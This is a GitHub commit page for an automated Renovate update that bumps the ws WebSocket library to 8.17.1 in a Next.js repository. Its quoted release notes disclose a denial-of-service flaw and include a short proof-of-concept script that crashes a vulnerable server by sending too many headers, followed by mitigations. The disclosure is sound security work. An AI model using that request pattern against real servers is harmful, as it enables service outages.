Skip to content

Commit

Permalink
Update dependency ws to v8.17.1 (#2122)
Browse files Browse the repository at this point in the history
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.16.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

-   Fixed a DoS vulnerability ([#&#8203;2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding the[`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1.  Reduce the maximum allowed length of the request headers using the
    [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
    that no more headers than the `server.maxHeadersCount` limit can be sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

### [`v8.17.0`](https://togithub.com/websockets/ws/releases/tag/8.17.0)

[Compare Source](https://togithub.com/websockets/ws/compare/8.16.0...8.17.0)

### Features

-   The `WebSocket` constructor now accepts the `createConnection` option ([#&#8203;2219](https://togithub.com/websockets/ws/issues/2219)).

### Other notable changes

-   The default value of the `allowSynchronousEvents` option has been changed to
    `true` ([#&#8203;2221](https://togithub.com/websockets/ws/issues/2221)).

This is a breaking change in a patch release. The assumption is that the option
is not widely used.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Nextjs).
  • Loading branch information
renovate[bot] authored Jun 17, 2024
1 parent c72819f commit 11b08e2
Show file tree
Hide file tree
Showing 2 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion package.json
Original file line number Diff line number Diff line change
Expand Up @@ -228,7 +228,7 @@
"webpack": "5.92.0",
"webpack-bundle-analyzer": "4.10.2",
"whatwg-fetch": "3.6.20",
"ws": "8.17.0"
"ws": "8.17.1"
},
"resolutions": {
"webpack": "5.92.0",
Expand Down
2 changes: 1 addition & 1 deletion packages/next/package.json
Original file line number Diff line number Diff line change
Expand Up @@ -313,7 +313,7 @@
"webpack": "5.92.0",
"webpack-sources1": "npm:[email protected]",
"webpack-sources3": "npm:[email protected]",
"ws": "8.17.0"
"ws": "8.17.1"
},
"engines": {
"node": ">=16.8.0"
Expand Down

0 comments on commit 11b08e2

Please sign in to comment.